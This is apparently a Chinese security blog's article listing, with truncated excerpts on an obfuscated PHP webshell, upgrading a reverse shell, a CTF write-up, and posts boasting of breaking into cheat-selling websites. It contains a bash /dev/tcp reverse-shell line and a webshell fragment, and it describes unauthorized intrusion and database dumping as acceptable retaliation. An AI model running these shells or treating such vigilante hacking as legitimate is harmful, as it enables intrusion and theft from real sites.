技术文章
yzddMr6
yzddmr6.tk
展开
-
一个有趣的Shell分析以及自己的一些想法 ——yzddMr6
前言 前一段时间有很多同学问我这个shell,看了下确实比较有意思,并且顺便也想讲一些自己的想法。 <?php $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p...原创 2019-12-17 22:07:01 · 397 阅读 · 1 评论 -
反弹Shell升级为交互式Shell ——yzddMr6
前言 看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell就升级到了一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 首先ubuntu建一个新用户:test,密码 test 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168...原创 2019-12-03 13:14:56 · 2489 阅读 · 0 评论 -
向吃鸡外挂站开炮(二)——yzddMr6
上一篇 向吃鸡外挂站开炮(一) 前言 首先打开网站我们可以看到他的炫酷界面 暖心公告 [图片上传失败…(image-cea3c9-1573117670522)] 不要脸的宣传词 发现注入 基于tp3开发,后台/admin 尝试万能密码 提示密码错误 尝试admin admin888 提示账号不存在 两者回显不同,考虑可能存在注入 无法利用? burp抓包发送到repeater进行...原创 2019-11-15 15:36:30 · 273 阅读 · 0 评论 -
向吃鸡外挂站开炮(一) ——yzddMr6
前言 因为最近吃鸡被外挂打自闭了,所以准备也让那些卖挂的体会一下什么叫做自闭。 昨天晚上爬了快1000个卖吃鸡外挂的平台 你们这些卖挂的,等我有空了一个一个捶。 发现大多数都是用的一套aspx的程序,可惜没有源码不能白盒审计,黑盒也找不到什么洞 只能找找软柿子捏 昨天晚上一口气锤了四个 基本上都有宝塔 不过php-venom 4 系列加上配套的编码器过宝塔稳得一批 脱了裤子发现里面...原创 2019-11-15 15:34:53 · 902 阅读 · 0 评论 -
2019“黄鹤杯”全国总决赛 WEB Write Up ——yzddMr6
前言 三天赶了两场比赛 黄鹤杯体验极佳 ,比某500空间好到不知哪里去了 web就两个题,一开始就打穿了 于是本菜鸡就开始了划水运动hhhhh web1 web1是个thinkphp5 扫一下目录有个www.zip 打开后看到源码 image 有注册 有登录按钮,然后看源码的意思是让你成为admin用户,然后可以得到一个hint来进行下一步 ...原创 2019-11-09 19:36:48 · 554 阅读 · 0 评论